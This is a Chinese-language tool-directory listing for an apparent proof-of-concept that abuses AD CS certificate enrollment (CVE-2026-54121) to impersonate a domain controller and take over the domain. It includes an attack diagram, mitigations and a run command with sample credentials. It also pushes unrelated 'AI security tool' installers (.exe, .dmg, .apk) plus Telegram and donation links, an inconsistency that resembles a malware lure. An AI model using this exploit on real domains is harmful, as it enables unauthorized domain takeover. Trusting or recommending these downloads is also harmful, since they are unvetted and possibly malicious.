Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-54121-Certighost — 针对 CVE-2026-54121(Certighost)的概念验证模块,通过恶意 LDAP/SMB 监听器利用 AD CS 注册验证,以冒充域控制器并通过 PKINIT 进行权限提升。 | Kitploit
工具/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
权限提升漏洞分析漏洞利用冒充工具后渗透利用渗透测试身份验证论文与研究红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

针对 CVE-2026-54121(Certighost)的概念验证模块,通过恶意 LDAP/SMB 监听器利用 AD CS 注册验证,以冒充域控制器并通过 PKINIT 进行权限提升。

查看仓库
13小时44分前尚未审核

🛡 AI 安全工具模块
CVE-2026-54121:Active Directory 证书服务身份模拟(Certighost)

AI 安全工具生态系统的官方安全审计模块


Latest Release Build Status Donations Telegram Channel License

🌐 在线演示 • 📚 项目网站 • 💬 社区聊天

网站导航: 首页 • 更新 • 下载 • 模块

AI Security Tool Banner


🧠 概念概述

本模块为 CVE-2026-54121(代号 Certighost)提供诊断能力。该漏洞存在于 Active Directory 证书服务(AD CS)中计算机账户证书注册的验证阶段。

拥有标准低权限域凭据的攻击者创建一个新的计算机账户,并提交包含被操纵的 cdc(受控 IP 监听器)和 rmd(目标 DC FQDN)属性的证书请求。当证书颁发机构(CA)回连以验证机器身份时,恶意的 LDAP(端口 389)和 SMB/LSA(端口 445)监听器会伪造目标域控制器的身份属性(sAMAccountName、SID、dNSHostName)。这诱使 CA 颁发真实的域控制器证书,从而通过 PKINIT 实现完整的域接管。

🎯 核心影响理念

"以机器身份认证,升级至整个域。"
Certighost 通过污染 CA 的身份解析管道,绕过了传统的 AD CS 模板权限。获取有效的域控制器证书即可立即获得 PKINIT 认证,从而同时获得 TGT 凭据缓存(.ccache)和目标 DC 的 NT 哈希。

📊 漏洞规格

🕸 攻击场景与架构

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 缓解措施清单

  • 🟢 应用安全更新: 在所有 AD CS 服务器上部署针对 CVE-2026-54121 的官方 Microsoft 补丁。
  • 🟢 限制机器账户创建: 将 ms-DS-MachineAccountQuota 设置为 0,以防止非管理员用户创建新的计算机对象。
  • 🟡 AD CS 加固: 禁用易受攻击的证书模板,并确保 EDITF_ATTRIBUTESUBJECTALTNAME2(ESC6)处于关闭状态,除非明确需要。
  • 🟡 网络过滤: 阻止 CA 服务器向任意工作站发起的出站 SMB(445)和 LDAP(389)流量。

💻 如何运行本模块

⚠️ 重要: 本模块设计用于 AI 安全工具框架内的安全诊断测试。请仅在获得授权且具有提升管理权限的目标上执行。

1️⃣ 安装 AI 安全工具

要执行诊断和监控脚本,请安装核心 AI 安全工具框架:

2️⃣ 安装依赖并执行

安装用于恶意 LDAP/SMB 监听器和证书处理所需的 Python 库:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 安全审计模块与 PoC 仓库

由我们社区维护的漏洞扫描器模块、PoC 脚本和研究仓库:

🔥 远程代码执行(RCE)与网络漏洞 4 个模块
  • CVE-2026-41089 — Netlogon 远程代码执行漏洞利用 @ZeroDayEvil
  • CVE-2026-20805 — Windows 远程代码执行概念验证 @ZeroDayEvil
  • CVE-2026-41096 — 严重 RCE 漏洞扫描器模块 @ZeroDayEvil
  • CVE-2026-24291 — 网络协议远程代码执行 @ZeroDayVPN
🛡 权限提升(EoP)与服务 3 个模块
  • CVE-2026-54121 — AD CS Certighost 域控制器身份模拟 @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice 服务权限提升 @ZeroDayVPN
  • CVE-2026-50416 — 本地权限提升分析与 PoC @ZeroDayEvil
📚 漏洞研究与分析报告 2 个模块
  • CVE-2026-42978 — 深度技术分析与 PoC 研究 @ZeroDayEvil
  • CVE-2026-83991 — 完整分析报告与漏洞利用演示 @ZeroDayVPN

⚖️ 许可证与法律免责声明

🚨 免责声明

本工具和安全分析严格用于授权的系统审计、防御性研究和渗透测试工作。
未经系统所有者明确书面许可,对域环境执行 CVE-2026-54121 属于违法行为。作者对未经授权的域接管、数据丢失或系统中断不承担任何责任。

🔄 贡献与社区

我们欢迎安全研究社区的贡献!主要贡献方向:

  1. AI 集成: 添加新的 LLM 提供商并开发专业安全代理。
  2. 安全工具: 开发漏洞模块并集成 CLI 扫描器。
  3. 优化: 提升解析器速度、执行安全性和缓存逻辑。
  4. 文档: 撰写研究论文、指南和本地化翻译。

🔗 联系与支持

  • 官方网站: ZeroDayEvil.com
  • 技术分析: H0j3n 的 Gist 解析
  • MSRC 公告: CVE-2026-54121 指南
  • Telegram 管理员: @ZeroDayEvil
  • Telegram 聊天: @ZeroDyaTool_chat
  • Telegram 频道: @ZeroDyaTool_channel
  • 赞助项目: PayPal 捐赠
  • Open Collective: opencollective.com/ZeroDayEvil

AI 安全工具 — 为网络安全专业人员重新构想终端工作流与自动化。

下载工具
规格分配值备注
CVE 标识符CVE-2026-54121Active Directory 证书服务身份模拟
严重性评级严重(CVSS v3.1:9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
漏洞类型CWE-287 / CWE-290认证不当 / 通过欺骗绕过认证
受影响组件Active Directory 证书服务(AD CS)证书注册与身份验证管道
攻击向量网络通过 SMB、LDAP 和 RPC 协议远程执行
所需权限低权限标准域用户账户(具备添加机器账户的能力)
操作系统 / 平台版本架构 / 格式发布日期状态下载链接
🪟 Windowsv6.3.20x64 安装程序(.exe)2026-09-08🟢 最新下载 .exe
🪟 Windowsv6.3.20x64 便携版(.tar.gz)2026-09-08🟢 最新下载 .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3(.dmg)2026-09-05🟢 稳定下载 .dmg
🐧 Linuxv5.3.27通用 x64(.tar.gz)2026-09-01🟢 稳定下载 .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK(.apk)2026-09-01🟢 稳定下载 .apk